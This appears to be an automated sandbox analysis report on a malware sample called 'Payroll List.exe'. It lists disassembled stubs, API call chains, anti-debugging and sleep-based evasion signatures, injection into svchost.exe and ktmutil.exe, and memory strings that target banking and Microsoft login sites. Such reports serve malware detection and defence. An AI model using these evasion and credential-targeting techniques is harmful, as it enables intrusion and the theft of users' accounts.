                Source: Binary string: svchost.pdbUGP source: ktmutil.exe, 00000006.00000002.3291580399.0000000002813000.00000004.00000020.00020000.00000000.sdmp, ktmutil.exe, 00000006.00000002.3293451407.00000000033CC000.00000004.10000000.00040000.00000000.sdmp, eLiCpwzRIeWAs.exe, 00000007.00000002.3292809726.0000000002E2C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000B.00000002.2045258675.00000000258CC000.00000004.80000000.00040000.00000000.sdmp
                Source: Payroll List.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                Source: Payroll List.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                Source: Payroll List.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                Source: Payroll List.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                Source: Payroll List.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                Source: C:\Users\user\Desktop\Payroll List.exeCode function: 0_2_0013E01E LoadLibraryA,GetProcAddress,0_2_0013E01E
                Source: C:\Users\user\Desktop\Payroll List.exeCode function: 0_2_0013288A push 66001323h; retn 0019h0_2_001328E1
                Source: C:\Users\user\Desktop\Payroll List.exeCode function: 0_2_00146B05 push ecx; ret 0_2_00146B18
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00416096 push eax; ret 2_2_004160E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004168B9 push 49A0F8CEh; ret 2_2_00416912
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004160BB push eax; ret 2_2_004160E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00416970 push 49A0F8CEh; ret 2_2_00416912
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041692F push 49A0F8CEh; ret 2_2_00416912
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004049B6 push cs; iretd 2_2_004049BA
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004032E0 push eax; ret 2_2_004032E2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00415A90 push ds; retf 2_2_00415A93
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041938B push ecx; retf 2_2_004193EC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00411BB6 push ecx; retf 2_2_00411BB8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004065E5 push cs; ret 2_2_004065F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00404E33 push ds; iretd 2_2_00404E63
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040D6C1 push ebp; retf 2_2_0040D6CA
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00404E91 push ds; iretd 2_2_00404E63
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039309AD push ecx; mov dword ptr [esp], ecx2_2_039309B6
                Source: C:\Program Files (x86)\jupCyaZDEYaMktXkMIVVtozRrAPkkVYrNNVAPNAouqQtQmhWwSoqIzjzYYAHZwwQMvInUdlRiRJTXV\eLiCpwzRIeWAs.exeCode function: 4_2_05190D40 push 49A0F8CEh; ret 4_2_05190CE2
                Source: C:\Program Files (x86)\jupCyaZDEYaMktXkMIVVtozRrAPkkVYrNNVAPNAouqQtQmhWwSoqIzjzYYAHZwwQMvInUdlRiRJTXV\eLiCpwzRIeWAs.exeCode function: 4_2_0517ED86 push cs; iretd 4_2_0517ED8A
                Source: C:\Program Files (x86)\jupCyaZDEYaMktXkMIVVtozRrAPkkVYrNNVAPNAouqQtQmhWwSoqIzjzYYAHZwwQMvInUdlRiRJTXV\eLiCpwzRIeWAs.exeCode function: 4_2_051809B5 push cs; ret 4_2_051809C0
                Source: C:\Program Files (x86)\jupCyaZDEYaMktXkMIVVtozRrAPkkVYrNNVAPNAouqQtQmhWwSoqIzjzYYAHZwwQMvInUdlRiRJTXV\eLiCpwzRIeWAs.exeCode function: 4_2_05181C34 push ecx; ret 4_2_05181C72
                Source: C:\Program Files (x86)\jupCyaZDEYaMktXkMIVVtozRrAPkkVYrNNVAPNAouqQtQmhWwSoqIzjzYYAHZwwQMvInUdlRiRJTXV\eLiCpwzRIeWAs.exeCode function: 4_2_05190466 push eax; ret 4_2_051904B9
                Source: C:\Program Files (x86)\jupCyaZDEYaMktXkMIVVtozRrAPkkVYrNNVAPNAouqQtQmhWwSoqIzjzYYAHZwwQMvInUdlRiRJTXV\eLiCpwzRIeWAs.exeCode function: 4_2_05190C89 push 49A0F8CEh; ret 4_2_05190CE2
                Source: C:\Program Files (x86)\jupCyaZDEYaMktXkMIVVtozRrAPkkVYrNNVAPNAouqQtQmhWwSoqIzjzYYAHZwwQMvInUdlRiRJTXV\eLiCpwzRIeWAs.exeCode function: 4_2_0519048B push eax; ret 4_2_051904B9
                Source: C:\Program Files (x86)\jupCyaZDEYaMktXkMIVVtozRrAPkkVYrNNVAPNAouqQtQmhWwSoqIzjzYYAHZwwQMvInUdlRiRJTXV\eLiCpwzRIeWAs.exeCode function: 4_2_05181CC0 push ecx; ret 4_2_05181C72
                Source: C:\Program Files (x86)\jupCyaZDEYaMktXkMIVVtozRrAPkkVYrNNVAPNAouqQtQmhWwSoqIzjzYYAHZwwQMvInUdlRiRJTXV\eLiCpwzRIeWAs.exeCode function: 4_2_05190CFF push 49A0F8CEh; ret 4_2_05190CE2
                Source: C:\Program Files (x86)\jupCyaZDEYaMktXkMIVVtozRrAPkkVYrNNVAPNAouqQtQmhWwSoqIzjzYYAHZwwQMvInUdlRiRJTXV\eLiCpwzRIeWAs.exeCode function: 4_2_0518BF86 push ecx; retf 4_2_0518BF88
                Source: C:\Program Files (x86)\jupCyaZDEYaMktXkMIVVtozRrAPkkVYrNNVAPNAouqQtQmhWwSoqIzjzYYAHZwwQMvInUdlRiRJTXV\eLiCpwzRIeWAs.exeCode function: 4_2_05181BB8 push ecx; ret 4_2_05181C72
                Source: C:\Program Files (x86)\jupCyaZDEYaMktXkMIVVtozRrAPkkVYrNNVAPNAouqQtQmhWwSoqIzjzYYAHZwwQMvInUdlRiRJTXV\eLiCpwzRIeWAs.exeCode function: 4_2_0517F203 push ds; iretd 4_2_0517F233
                Source: C:\Program Files (x86)\jupCyaZDEYaMktXkMIVVtozRrAPkkVYrNNVAPNAouqQtQmhWwSoqIzjzYYAHZwwQMvInUdlRiRJTXV\eLiCpwzRIeWAs.exeCode function: 4_2_0517F261 push ds; iretd 4_2_0517F233
                Source: C:\Program Files (x86)\jupCyaZDEYaMktXkMIVVtozRrAPkkVYrNNVAPNAouqQtQmhWwSoqIzjzYYAHZwwQMvInUdlRiRJTXV\eLiCpwzRIeWAs.exeCode function: 4_2_0518FE60 push ds; retf 4_2_0518FE63
                Source: C:\Users\user\Desktop\Payroll List.exeCode function: 0_2_00188111 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_00188111
                Source: C:\Users\user\Desktop\Payroll List.exeCode function: 0_2_0013EB42 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_0013EB42
                Source: C:\Users\user\Desktop\Payroll List.exeCode function: 0_2_0014123A __initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_0014123A
                Source: C:\Users\user\Desktop\Payroll List.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\ktmutil.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                Source: C:\Users\user\Desktop\Payroll List.exeAPI/Special instruction interceptor: Address: D5808C
                Source: C:\Windows\SysWOW64\ktmutil.exeAPI/Special instruction interceptor: Address: 7FFBCB7AD324
                Source: C:\Windows\SysWOW64\ktmutil.exeAPI/Special instruction interceptor: Address: 7FFBCB7AD7E4
                Source: C:\Windows\SysWOW64\ktmutil.exeAPI/Special instruction interceptor: Address: 7FFBCB7AD944
                Source: C:\Windows\SysWOW64\ktmutil.exeAPI/Special instruction interceptor: Address: 7FFBCB7AD504
                Source: C:\Windows\SysWOW64\ktmutil.exeAPI/Special instruction interceptor: Address: 7FFBCB7AD544
                Source: C:\Windows\SysWOW64\ktmutil.exeAPI/Special instruction interceptor: Address: 7FFBCB7AD1E4
                Source: C:\Windows\SysWOW64\ktmutil.exeAPI/Special instruction interceptor: Address: 7FFBCB7B0154
                Source: C:\Windows\SysWOW64\ktmutil.exeAPI/Special instruction interceptor: Address: 7FFBCB7ADA44
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0397096E rdtsc 2_2_0397096E
                Source: C:\Users\user\Desktop\Payroll List.exeEvaded block: after key decisiongraph_0-95573
                Source: C:\Users\user\Desktop\Payroll List.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_0-96022
                Source: C:\Users\user\Desktop\Payroll List.exeAPI coverage: 4.2 %
                Source: C:\Windows\SysWOW64\svchost.exeAPI coverage: 0.8 %
                Source: C:\Windows\SysWOW64\ktmutil.exeAPI coverage: 2.6 %
                Source: C:\Windows\SysWOW64\ktmutil.exe TID: 8044Thread sleep count: 41 > 30
                Source: C:\Windows\SysWOW64\ktmutil.exe TID: 8044Thread sleep time: -82000s >= -30000s
                Source: C:\Program Files (x86)\jupCyaZDEYaMktXkMIVVtozRrAPkkVYrNNVAPNAouqQtQmhWwSoqIzjzYYAHZwwQMvInUdlRiRJTXV\eLiCpwzRIeWAs.exe TID: 8056Thread sleep time: -50000s >= -30000s
                Source: C:\Program Files (x86)\jupCyaZDEYaMktXkMIVVtozRrAPkkVYrNNVAPNAouqQtQmhWwSoqIzjzYYAHZwwQMvInUdlRiRJTXV\eLiCpwzRIeWAs.exe TID: 8056Thread sleep time: -36000s >= -30000s
                Source: C:\Windows\SysWOW64\ktmutil.exeLast function: Thread delayed
                Source: C:\Users\user\Desktop\Payroll List.exeCode function: 0_2_00166CA9 GetFileAttributesW,FindFirstFileW,FindClose,0_2_00166CA9
                Source: C:\Users\user\Desktop\Payroll List.exeCode function: 0_2_001660DD _wcscat,_wcscat,__wsplitpath,FindFirstFileW,DeleteFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,0_2_001660DD
                Source: C:\Users\user\Desktop\Payroll List.exeCode function: 0_2_001663F9 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,0_2_001663F9
                Source: C:\Users\user\Desktop\Payroll List.exeCode function: 0_2_0016EB60 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0016EB60
                Source: C:\Users\user\Desktop\Payroll List.exeCode function: 0_2_0016F56F FindFirstFileW,FindClose,0_2_0016F56F
                Source: C:\Users\user\Desktop\Payroll List.exeCode function: 0_2_0016F5FA FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_0016F5FA
                Source: C:\Users\user\Desktop\Payroll List.exeCode function: 0_2_00171B2F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00171B2F
                Source: C:\Users\user\Desktop\Payroll List.exeCode function: 0_2_00171C8A SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00171C8A
                Source: C:\Users\user\Desktop\Payroll List.exeCode function: 0_2_00171F94 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00171F94
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_0041C810 FindFirstFileW,FindNextFileW,FindClose,6_2_0041C810
                Source: C:\Users\user\Desktop\Payroll List.exeCode function: 0_2_0013DDC0 GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_0013DDC0
                Source: 283026M3L.6.drBinary or memory string: ms.portal.azure.comVMware20,11696494690
                Source: 283026M3L.6.drBinary or memory string: discord.comVMware20,11696494690f
                Source: 283026M3L.6.drBinary or memory string: AMC password management pageVMware20,11696494690
                Source: 283026M3L.6.drBinary or memory string: outlook.office.comVMware20,11696494690s
                Source: 283026M3L.6.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
                Source: 283026M3L.6.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
                Source: 283026M3L.6.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
                Source: ktmutil.exe, 00000006.00000002.3296566813.00000000076CC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696494
                Source: 283026M3L.6.drBinary or memory string: interactivebrokers.comVMware20,11696494690
                Source: 283026M3L.6.drBinary or memory string: netportal.hdfcbank.comVMware20,11696494690
                Source: 283026M3L.6.drBinary or memory string: interactivebrokers.co.inVMware20,11696494690d
                Source: 283026M3L.6.drBinary or memory string: account.microsoft.com/profileVMware20,11696494690u
                Source: 283026M3L.6.drBinary or memory string: outlook.office365.comVMware20,11696494690t
                Source: 283026M3L.6.drBinary or memory string: www.interactivebrokers.comVMware20,11696494690}
                Source: 283026M3L.6.drBinary or memory string: microsoft.visualstudio.comVMware20,11696494690x
                Source: 283026M3L.6.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
                Source: 283026M3L.6.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696494690
                Source: eLiCpwzRIeWAs.exe, 00000007.00000002.3292809726.000000000385C000.00000004.00000001.00040000.00000000.sdmpBinary or memory string: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?1fo=GF14svyhH44dt&NjHpTfh=t68BN09iVeqb/IuLF1oa7LGDO07/W7CFIoocHQs3lozqg6PiE4irZB+dVkRcNKn3qqYTfz+U2KKskdRsvGv4dMSPmSyMXvFwuhBmNF6SR00f5xEMx0RhVmciiGarBUFx9Q=="}</script></head></html>
                Source: firefox.exe, 0000000B.00000002.2046701731.00000262A57BC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: eLiCpwzRIeWAs.exe, 00000007.00000002.3292122511.0000000000E0F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll#
                Source: 283026M3L.6.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
                Source: 283026M3L.6.drBinary or memory string: trackpan.utiitsl.comVMware20,11696494690h
                Source: 283026M3L.6.drBinary or memory string: tasks.office.comVMware20,11696494690o
                Source: ktmutil.exe, 00000006.00000002.3296566813.00000000076CC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: rd.comVMware20,11696494690f
                Source: 283026M3L.6.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
                Source: ktmutil.exe, 00000006.00000002.3296566813.00000000076CC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ansaction PasswordVMware20,11696494690
                Source: 283026M3L.6.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
                Source: 283026M3L.6.drBinary or memory string: dev.azure.comVMware20,11696494690j
                Source: 283026M3L.6.drBinary or memory string: global block list test formVMware20,11696494690
                Source: 283026M3L.6.drBinary or memory string: turbotax.intuit.comVMware20,11696494690t
                Source: ktmutil.exe, 00000006.00000002.3291580399.0000000002813000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllI
                Source: 283026M3L.6.drBinary or memory string: bankofamerica.comVMware20,11696494690x
                Source: 283026M3L.6.drBinary or memory string: Canara Transaction PasswordVMware20,11696494690}
                Source: 283026M3L.6.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690
                Source: 283026M3L.6.drBinary or memory string: Interactive Brokers - HKVMware20,11696494690]
                Source: 283026M3L.6.drBinary or memory string: Canara Transaction PasswordVMware20,11696494690x
                Source: 283026M3L.6.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
                Source: 283026M3L.6.drBinary or memory string: secure.bankofamerica.comVMware20,11696494690|UE
                Source: C:\Users\user\Desktop\Payroll List.exeAPI call chain: ExitProcess graph end nodegraph_0-95353
                Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformation
                Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPort
                Source: C:\Windows\SysWOW64\ktmutil.exeProcess queried: DebugPort
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0397096E rdtsc 2_2_0397096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00417A83 LdrLoadDll,2_2_00417A83
                Source: C:\Users\user\Desktop\Payroll List.exeCode function: 0_2_00176AAF BlockInput,0_2_00176AAF
                Source: C:\Users\user\Desktop\Payroll List.exeCode function: 0_2_00123D19 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00123D19
                Source: C:\Users\user\Desktop\Payroll List.exeCode function: 0_2_00153920 LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,IsDebuggerPresent,OutputDebugStringW,0_2_00153920
                Source: C:\Users\user\Desktop\Payroll List.exeCode function: 0_2_0013E01E LoadLibraryA,GetProcAddress,0_2_0013E01E
                Source: C:\Users\user\Desktop\Payroll List.exeCode function: 0_2_00D582F8 mov eax, dword ptr fs:[00000030h]0_2_00D582F8
                Source: C:\Users\user\Desktop\Payroll List.exeCode function: 0_2_00D58358 mov eax, dword ptr fs:[00000030h]0_2_00D58358
                Source: C:\Users\user\Desktop\Payroll List.exeCode function: 0_2_00D56CD8 mov eax, dword ptr fs:[00000030h]0_2_00D56CD8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03928397 mov eax, dword ptr fs:[00000030h]2_2_03928397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392E388 mov eax, dword ptr fs:[00000030h]2_2_0392E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395438F mov eax, dword ptr fs:[00000030h]2_2_0395438F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039D43D4 mov eax, dword ptr fs:[00000030h]2_2_039D43D4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039EC3CD mov eax, dword ptr fs:[00000030h]2_2_039EC3CD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393A3C0 mov eax, dword ptr fs:[00000030h]2_2_0393A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039383C0 mov eax, dword ptr fs:[00000030h]2_2_039383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B63C0 mov eax, dword ptr fs:[00000030h]2_2_039B63C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394E3F0 mov eax, dword ptr fs:[00000030h]2_2_0394E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039663FF mov eax, dword ptr fs:[00000030h]2_2_039663FF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039403E9 mov eax, dword ptr fs:[00000030h]2_2_039403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392C310 mov ecx, dword ptr fs:[00000030h]2_2_0392C310
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03950310 mov ecx, dword ptr fs:[00000030h]2_2_03950310
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396A30B mov eax, dword ptr fs:[00000030h]2_2_0396A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B035C mov eax, dword ptr fs:[00000030h]2_2_039B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B035C mov ecx, dword ptr fs:[00000030h]2_2_039B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039FA352 mov eax, dword ptr fs:[00000030h]2_2_039FA352
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B2349 mov eax, dword ptr fs:[00000030h]2_2_039B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B2349 mov eax, dword ptr fs:[00000030h]2_2_039B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B2349 mov eax, dword ptr fs:[00000030h]2_2_039B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B2349 mov eax, dword ptr fs:[00000030h]2_2_039B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B2349 mov eax, dword ptr fs:[00000030h]2_2_039B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B2349 mov eax, dword ptr fs:[00000030h]2_2_039B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B2349 mov eax, dword ptr fs:[00000030h]2_2_039B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B2349 mov eax, dword ptr fs:[00000030h]2_2_039B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B2349 mov eax, dword ptr fs:[00000030h]2_2_039B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B2349 mov eax, dword ptr fs:[00000030h]2_2_039B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B2349 mov eax, dword ptr fs:[00000030h]2_2_039B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B2349 mov eax, dword ptr fs:[00000030h]2_2_039B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B2349 mov eax, dword ptr fs:[00000030h]2_2_039B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B2349 mov eax, dword ptr fs:[00000030h]2_2_039B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B2349 mov eax, dword ptr fs:[00000030h]2_2_039B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039D437C mov eax, dword ptr fs:[00000030h]2_2_039D437C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396E284 mov eax, dword ptr fs:[00000030h]2_2_0396E284
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396E284 mov eax, dword ptr fs:[00000030h]2_2_0396E284
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B0283 mov eax, dword ptr fs:[00000030h]2_2_039B0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B0283 mov eax, dword ptr fs:[00000030h]2_2_039B0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B0283 mov eax, dword ptr fs:[00000030h]2_2_039B0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039402A0 mov eax, dword ptr fs:[00000030h]2_2_039402A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039402A0 mov eax, dword ptr fs:[00000030h]2_2_039402A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C62A0 mov eax, dword ptr fs:[00000030h]2_2_039C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C62A0 mov ecx, dword ptr fs:[00000030h]2_2_039C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C62A0 mov eax, dword ptr fs:[00000030h]2_2_039C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C62A0 mov eax, dword ptr fs:[00000030h]2_2_039C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C62A0 mov eax, dword ptr fs:[00000030h]2_2_039C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C62A0 mov eax, dword ptr fs:[00000030h]2_2_039C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393A2C3 mov eax, dword ptr fs:[00000030h]2_2_0393A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393A2C3 mov eax, dword ptr fs:[00000030h]2_2_0393A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393A2C3 mov eax, dword ptr fs:[00000030h]2_2_0393A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393A2C3 mov eax, dword ptr fs:[00000030h]2_2_0393A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393A2C3 mov eax, dword ptr fs:[00000030h]2_2_0393A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039402E1 mov eax, dword ptr fs:[00000030h]2_2_039402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039402E1 mov eax, dword ptr fs:[00000030h]2_2_039402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039402E1 mov eax, dword ptr fs:[00000030h]2_2_039402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392823B mov eax, dword ptr fs:[00000030h]2_2_0392823B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392A250 mov eax, dword ptr fs:[00000030h]2_2_0392A250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03936259 mov eax, dword ptr fs:[00000030h]2_2_03936259
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B8243 mov eax, dword ptr fs:[00000030h]2_2_039B8243
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B8243 mov ecx, dword ptr fs:[00000030h]2_2_039B8243
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E0274 mov eax, dword ptr fs:[00000030h]2_2_039E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E0274 mov eax, dword ptr fs:[00000030h]2_2_039E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E0274 mov eax, dword ptr fs:[00000030h]2_2_039E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E0274 mov eax, dword ptr fs:[00000030h]2_2_039E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E0274 mov eax, dword ptr fs:[00000030h]2_2_039E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E0274 mov eax, dword ptr fs:[00000030h]2_2_039E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E0274 mov eax, dword ptr fs:[00000030h]2_2_039E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E0274 mov eax, dword ptr fs:[00000030h]2_2_039E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E0274 mov eax, dword ptr fs:[00000030h]2_2_039E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E0274 mov eax, dword ptr fs:[00000030h]2_2_039E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E0274 mov eax, dword ptr fs:[00000030h]2_2_039E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E0274 mov eax, dword ptr fs:[00000030h]2_2_039E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03934260 mov eax, dword ptr fs:[00000030h]2_2_03934260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03934260 mov eax, dword ptr fs:[00000030h]2_2_03934260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03934260 mov eax, dword ptr fs:[00000030h]2_2_03934260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392826B mov eax, dword ptr fs:[00000030h]2_2_0392826B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B019F mov eax, dword ptr fs:[00000030h]2_2_039B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B019F mov eax, dword ptr fs:[00000030h]2_2_039B019F
